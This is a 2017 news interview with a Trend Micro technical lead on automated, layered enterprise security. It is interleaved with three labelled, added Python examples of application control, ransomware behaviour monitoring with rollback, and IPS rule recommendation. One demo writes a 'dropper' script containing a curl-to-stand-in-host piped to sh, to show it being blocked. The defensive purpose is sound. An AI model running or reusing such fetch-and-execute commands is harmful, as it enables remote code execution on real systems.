Tuesday, 14 November 2017 17:37

Integrate security into operations and make it easier for everyone, says Trend Micro


Mick McCluney, ANZ Technical Lead for security software vendor Trend Micro, says better enterprise cyber security can be yours, with these simple steps.

In today’s real-time enterprise, with a focus on doing more with less, it is tempting for technical teams to take shortcuts. In software development this is often labelled “technical debt” but it applies equally to infrastructure.

Forgetting to manually apply security controls is one such shortcut, and the result is servers put into production without adequate protection and with high-risk vulnerabilities open to exploitation. A recent prominent example is Equifax, which exposed the identity and credit details of well over 100 million US citizens and was traced to unpatched software.

McCluney took a break from presenting at VMware’s vForum event in Sydney to speak to iTWire. “When we build workloads in virtualised environments, we must understand their security posture at the beginning and deploy their security when we deploy the workload,” he said.

“Some of the things we encourage people to do are to look at event-based tasks that look for new workloads and automatically deploy the right security policy to those workloads as they come online.

“As people talk about automation they talk about APIs. They talk about building a workload by API, amending a policy by API, and so on - this is transformative IT where your pipeline is driven by these orchestration tools. Security has to fit right in there.”

For example, he says, “you can have application control, which again can be API-driven, so when you're deploying your code from your orchestration tools they can call the API to put the workload into maintenance mode while deploying, then use the API again to lock the executable code down”.

This is great, McCluney says, “because you’ve worked with DevOps and put security into the process and it's not a pain. This can be done in prod and test and so on through the whole pipeline”.
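The maintenance-mode and lockdown cycle described above, as an added example that is not Trend Micro's code or API. It models application control as an allow-list of executable hashes: the pipeline opens a maintenance window before deploying, and on closing it the baseline is rebuilt from what was actually deployed, after which anything not in the baseline, or changed since, is refused. The `AppControl` class, its method names and the app tree it creates are hypothetical; a real product enforces the decision in a kernel driver rather than in a check function like this one.

```python
"""Application control as an executable allow-list with a maintenance-mode /
lockdown cycle, the way a deployment pipeline would drive it. Added example,
not Trend Micro's code or API: the AppControl class, its method names and the
constructed app tree are hypothetical."""
import hashlib
import json
import stat
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def is_executable(path: Path) -> bool:
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    return path.is_file() and bool(path.stat().st_mode & exec_bits)


class AppControl:
    """Allow-list of executable hashes under `root`, persisted in `baseline_file`."""

    def __init__(self, root: Path, baseline_file: Path) -> None:
        self.root = root
        self.baseline_file = baseline_file
        self.maintenance = False
        self.baseline: Dict[str, str] = (
            json.loads(baseline_file.read_text()) if baseline_file.exists() else {}
        )

    def enter_maintenance(self) -> None:
        # Pipeline calls this before deploying: changes are expected, not blocked.
        self.maintenance = True

    def exit_maintenance(self) -> None:
        # Pipeline calls this after deploying: rebuild the baseline from what was
        # actually deployed, persist it, and lock down.
        self.baseline = {
            p.relative_to(self.root).as_posix(): sha256_file(p)
            for p in sorted(self.root.rglob("*")) if is_executable(p)
        }
        self.baseline_file.write_text(json.dumps(self.baseline, indent=1, sort_keys=True))
        self.maintenance = False

    def check_exec(self, path: Path) -> Tuple[bool, str]:
        """Decision for an attempt to execute `path`: (allowed, reason)."""
        rel = path.relative_to(self.root).as_posix()
        if self.maintenance:
            return True, f"maintenance: {rel} permitted, will be baselined on lockdown"
        expected = self.baseline.get(rel)
        if expected is None:
            return False, f"blocked: {rel} is not in the allow-list"
        if sha256_file(path) != expected:
            return False, f"blocked: {rel} was modified since lockdown"
        return True, f"allowed: {rel}"


def write_exec(path: Path, content: str) -> None:
    path.write_text(content)
    path.chmod(0o755)


def run_demo(root: Optional[Path] = None) -> Dict[str, Tuple[bool, str]]:
    """Deploy and lock down, then try a dropped binary and a tampered one.
    Uses a constructed app tree in a temp dir; returns every decision."""
    root = root or Path(tempfile.mkdtemp(prefix="appctl-"))
    ac = AppControl(root, root / ".allowlist.json")
    results: Dict[str, Tuple[bool, str]] = {}

    ac.enter_maintenance()                                   # 1. deploy window opens
    write_exec(root / "app.sh", "#!/bin/sh\necho v1\n")
    results["during_maintenance"] = ac.check_exec(root / "app.sh")
    ac.exit_maintenance()                                    # 2. baseline + lockdown
    results["after_deploy"] = ac.check_exec(root / "app.sh")

    # Something that did not arrive through the pipeline (constructed "dropper").
    write_exec(root / "dropper.sh", "#!/bin/sh\ncurl http://example.invalid/x | sh\n")
    results["dropper"] = ac.check_exec(root / "dropper.sh")

    write_exec(root / "app.sh", "#!/bin/sh\necho backdoored\n")  # modified in place
    results["tampered"] = ac.check_exec(root / "app.sh")
    return results


if __name__ == "__main__":
    for name, (ok, why) in run_demo().items():
        print(f"{name:19} {'ALLOW' if ok else 'DENY':5} {why}")
```

The `during_maintenance` result is the one to watch: while the window is open anything may run, so the window should be opened and closed by the same pipeline step that deploys, and kept as short as that step is.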

“The more you can integrate your security into your operational processes the easier it is for everyone to be security-aware and compliant as part of their normal process.

“Our approach at Trend Micro is to have recommendation scans on servers that look for vulnerabilities either at an Operating System level or the application layer, then allow an Intrusion Protection System (IPS) ruleset to protect the server from vulnerabilities on the applications or operating system.”

To clarify, McCluney points to well-publicised security vulnerabilities of recent years — ShellShock and Heartbleed — as well as Apache Struts, WordPress and Oracle vulnerabilities.

“Trend Micro’s view is if we can understand the vulnerability, we can create an IPS rule for it, and that can be deployed to your workload automatically.

“With ShellShock we were protecting customers from hundreds of attacks within five days.”

Complexity in security exists, and it’s because “no single approach works,” McCluney says. “You need multiple layers and you need automation as well. Trend Micro helps with host-based IPS, as well as deep security products like Machine Learning (ML), file integrity monitoring, log monitoring, application control, file warning and behaviour monitoring.

“For example, if we see ransomware executing on an endpoint we can prevent it from running. We can use ML to see if an unknown file looks suspicious. It may not be known in our global intelligence cloud so the software will watch it. If it starts encrypting files then we can stop it on the third one and roll its changes back.

“We’ve had behaviour monitoring for eight years. We’ve had ML for a year or so in some products, and will roll it out through the rest.”
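The ransomware behaviour described above (watch an unknown process, stop it on the third encrypted file, roll its changes back), as an added example that is not Trend Micro's code. A write hook journals each file's pre-image, treats a write that turns a low-entropy (readable) file into a high-entropy blob as suspicious, blocks the process once it has done that three times, and restores the journaled pre-images. The thresholds, the `BehaviourMonitor` class and the sample documents are constructed here.

```python
"""Behaviour monitoring for ransomware: a file-write hook that journals each
file's pre-image, flags writes that turn readable files into high-entropy
blobs, blocks the offending process on the third such write and rolls its
changes back. Added example, not Trend Micro's code; thresholds, names and
the sample documents are chosen here for illustration."""
import math
import os
import tempfile
from collections import Counter, defaultdict
from pathlib import Path
from typing import Dict, List, Optional, Set

HIGH_ENTROPY = 7.0   # bits per byte; encrypted or compressed data approaches 8
LOW_ENTROPY = 5.5    # text, source and most config files sit well below this
BLOCK_AFTER = 3      # block on the third suspicious write ("stop it on the third one")


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


class BehaviourMonitor:
    def __init__(self) -> None:
        self.journal: Dict[int, Dict[Path, bytes]] = defaultdict(dict)  # pid -> {path: pre-image}
        self.suspicious: Counter = Counter()                            # pid -> suspicious writes
        self.blocked: Set[int] = set()
        self.restored: Dict[int, int] = {}                              # pid -> files rolled back

    def on_write(self, pid: int, path: Path, new_data: bytes) -> str:
        """Hook invoked before `pid` writes `new_data` to `path`.
        Returns 'allowed', 'denied' (pid already blocked) or 'blocked+rolled_back'."""
        if pid in self.blocked:
            return "denied"
        original = path.read_bytes() if path.exists() else b""
        self.journal[pid].setdefault(path, original)   # keep only the first pre-image
        if shannon_entropy(original) < LOW_ENTROPY and shannon_entropy(new_data) > HIGH_ENTROPY:
            self.suspicious[pid] += 1
            if self.suspicious[pid] >= BLOCK_AFTER:
                self.blocked.add(pid)
                self._rollback(pid)
                return "blocked+rolled_back"
        path.write_bytes(new_data)   # not yet proven malicious: allow, pre-image is journaled
        return "allowed"

    def _rollback(self, pid: int) -> None:
        restored = 0
        for p, original in self.journal[pid].items():
            if not original:
                if p.exists():
                    p.unlink()       # the process created this file; remove it
                    restored += 1
            elif p.read_bytes() != original:
                p.write_bytes(original)
                restored += 1
        self.restored[pid] = restored


def run_demo(root: Optional[Path] = None) -> dict:
    """Constructed scenario: a text editor (pid 100) makes a normal edit, then a
    simulated ransomware process (pid 666) overwrites documents with one-time-pad
    ciphertext, which is indistinguishable from random bytes."""
    root = root or Path(tempfile.mkdtemp(prefix="bm-"))
    docs: List[Path] = []
    for i in range(5):
        p = root / f"report{i}.txt"
        p.write_text(f"Quarterly figures, line {i}: revenue up, costs flat.\n" * 80)  # ~4 KB
        docs.append(p)
    originals = {p: p.read_bytes() for p in docs}
    mon = BehaviourMonitor()

    notes = root / "notes.txt"
    editor = mon.on_write(100, notes, b"Meeting notes: follow up on Q3 numbers.\n" * 20)

    outcomes = []
    for p in docs:
        plaintext = p.read_bytes()
        pad = os.urandom(len(plaintext))
        ciphertext = bytes(a ^ b for a, b in zip(plaintext, pad))
        outcomes.append(mon.on_write(666, p, ciphertext))

    return {
        "editor": editor,
        "ransomware": outcomes,
        "docs_intact": all(p.read_bytes() == originals[p] for p in docs),
        "files_restored": mon.restored.get(666, 0),
    }


if __name__ == "__main__":
    print(run_demo())
```

Two caveats a practitioner would add: the entropy test alone also fires on legitimate compression or encryption tools, which is why it is one signal among several rather than the whole decision, and the pre-image journal only protects against processes the hook saw, so it has to sit below the application (filter driver, not library shim) to be worth anything.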


Even so, “signatures still play a useful role, because we see we can knock out a lot of known bad at low cost. Signatures offer a good black-and-white defence. Then if it’s unknown, we can use ML capabilities on it. If we still can’t decide, we can let it run but use runtime ML to look at the calls it's making, and look for identifiable patterns and behaviour monitoring in terms of what it's running so we catch zero day exploits and ransomware. This has been a successful approach,” he says. “The next layer after that — the ultimate test — is sandboxing.”

There is big money in ransomware and business email compromise, McCluney says, estimating it at billions of dollars. “There’s a lot of R&D into the next compromise, which is why ML is so important.”

Trend Micro purchased TippingPoint from HPE (Hewlett Packard Enterprise) two years ago, and with it came DVLabs (Digital Vaccine Labs), which runs the Zero Day Initiative (ZDI), dedicated to early identification of vulnerabilities. “We're finding out about these vulnerabilities and as soon as we find out we can inform the vendor and write IPS rules to protect our customers and provide protection around those vulnerabilities.”

“That links into our virtual patching which is about having the right IPS rules on the right server based on the recommendation scan. It can detect you have, say, ‘abc’ software on ‘xyz’ server and then have it download and run those rules.”
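The recommendation-scan-to-IPS-rule step McCluney describes here and in the earlier paragraph on scanning the OS and application layers, as an added example that is not Trend Micro's scanner, rule format or API. A scan produces a software inventory for a server; the catalogue maps each IPS rule to a product and an affected version range; the reconciliation step assigns rules the server newly needs and, just as important, retires rules for software that has since been patched past the range. The catalogue, rule IDs, version ranges and inventory below are constructed for illustration (loosely modelled on the Struts, OpenSSL and WordPress issues mentioned in the interview), not an authoritative advisory.

```python
"""Recommendation scan for virtual patching: match a server's software
inventory against an IPS rule catalogue by affected version range, then work
out which rules to assign and which to retire. Added example, not Trend
Micro's scanner or rule format; the catalogue, rule IDs, version ranges and
inventory below are constructed for illustration, not an authoritative advisory."""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

_TOKEN = re.compile(r"(\d+)([a-z]*)")


def parse_version(v: str) -> Tuple[Tuple[int, str], ...]:
    """'2.3.31' -> ((2,''),(3,''),(31,'')); '1.0.1f' -> ((1,''),(0,''),(1,'f')).
    A letter suffix sorts after the bare number (1.0.1 < 1.0.1f < 1.0.1g), and a
    shorter version sorts before a longer one with the same prefix (2.5 < 2.5.10)."""
    parts = []
    for tok in v.split("."):
        m = _TOKEN.fullmatch(tok)
        if not m:
            raise ValueError(f"unparseable version token {tok!r} in {v!r}")
        parts.append((int(m.group(1)), m.group(2)))
    return tuple(parts)


def version_in_range(v: str, lo: str, hi_exclusive: str) -> bool:
    return parse_version(lo) <= parse_version(v) < parse_version(hi_exclusive)


@dataclass(frozen=True)
class IPSRule:
    rule_id: str
    product: str
    affected_from: str      # inclusive
    fixed_in: str           # exclusive: versions at or above this need no rule
    note: str


# Constructed catalogue; ranges are illustrative only.
RULE_CATALOGUE: List[IPSRule] = [
    IPSRule("RULE-1001", "apache-struts", "2.3.5", "2.3.32", "OGNL injection via Content-Type header"),
    IPSRule("RULE-1002", "apache-struts", "2.5", "2.5.10.1", "OGNL injection via Content-Type header"),
    IPSRule("RULE-2001", "openssl", "1.0.1", "1.0.1g", "TLS heartbeat over-read"),
    IPSRule("RULE-4001", "wordpress", "4.7", "4.7.2", "REST API content injection"),
]

# Constructed inventory, as a recommendation scan of 'web01' might produce it.
WEB01_INVENTORY: Dict[str, str] = {
    "apache-struts": "2.3.31",
    "openssl": "1.0.2k",     # already upgraded past the affected range
    "wordpress": "4.7.1",
    "nginx": "1.12.2",       # nothing in the catalogue for it
}


def recommend(inventory: Dict[str, str], catalogue: List[IPSRule]) -> Set[str]:
    """Rule IDs whose product is installed in an affected version."""
    return {
        r.rule_id for r in catalogue
        if r.product in inventory
        and version_in_range(inventory[r.product], r.affected_from, r.fixed_in)
    }


def reconcile(inventory: Dict[str, str], catalogue: List[IPSRule],
              currently_assigned: Set[str]) -> Dict[str, Set[str]]:
    """Diff the recommendation against what the server already has, so rules
    are both added for new exposure and retired once the software is patched."""
    wanted = recommend(inventory, catalogue)
    return {
        "assign": wanted - currently_assigned,
        "unassign": currently_assigned - wanted,
        "keep": wanted & currently_assigned,
    }


if __name__ == "__main__":
    # web01 still carries the OpenSSL rule from before its upgrade.
    for action, rules in reconcile(WEB01_INVENTORY, RULE_CATALOGUE, {"RULE-2001"}).items():
        print(f"{action:8} {sorted(rules)}")
```

The version comparison is the part that goes wrong in practice: a catalogue keyed on exact version strings misses backported fixes and distribution-patched packages entirely, so a real scan has to consult the package manager's own notion of "fixed" rather than the upstream version number alone.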

When asked for his number one security tip, McCluney says “the capability to use IPS to prevent attacks on known vulnerabilities is a great mitigating control.”

“With Equifax, Apache Struts had a vulnerability. Maybe it couldn’t be patched quickly enough, but where was the mitigating control?” he asks.

“A company should have had an IPS. It’s the same with WannaCry – ok, you may not be able to patch the vulnerability, but did you have anything else to protect you? The mitigating control is important,” McCluney states.

“The other thing that comes top of mind to me is a significant amount of attacks come through email. Do you have an email defensive system applying proper sandboxing? Are you taking the threats out of email, putting them in a sandbox, detonating them, to see if they are malicious, and can you prevent them at that stage? I couldn’t recommend more the need to have a good layer policy on email coming in.

“From an endpoint policy point of view, if it's got to the machine through the email, and someone’s hit the link, you need to concentrate on what layers you have available and if you can catch things as they run. This is where endpoint ML and behaviour monitoring come in.

“I’d recommend any organisation think about security at the beginning and having that as part of the operational pipeline. Multiple layers of defence are needed. Anti-malware signatures are good, but behaviour monitoring, ML, app control, file integrity monitoring and log monitoring are all great things to have in your armoury.”

While Trend Micro is an international organisation, founded in Los Angeles, with global headquarters in Tokyo and an R&D centre in Taipei, it is doing good things in Australia.

“One of our data scientists in Melbourne, Jon Oliver, is very influential in our ML capabilities. He was instrumental in the way we focused on ransomware within the company. He saw the attack on Australia in a strong way two years ago, and a lot of the protections Trend Micro brought in were based on thought leadership from this country. Jon has over 100 patents to his name,” McCluney says.

David M Williams

David has been computing since 1984 where he instantly gravitated to the family Commodore 64. He completed a Bachelor of Computer Science degree from 1990 to 1992, commencing full-time employment as a systems analyst at the end of that year. David subsequently worked as a UNIX Systems Manager, Asia-Pacific technical specialist for an international software company, Business Analyst, IT Manager, and other roles. David has been the Chief Information Officer for national public companies since 2007, delivering IT knowledge and business acumen, seeking to transform the industries within which he works. David is also involved in the user group community, the Australian Computer Society technical advisory boards, and education.
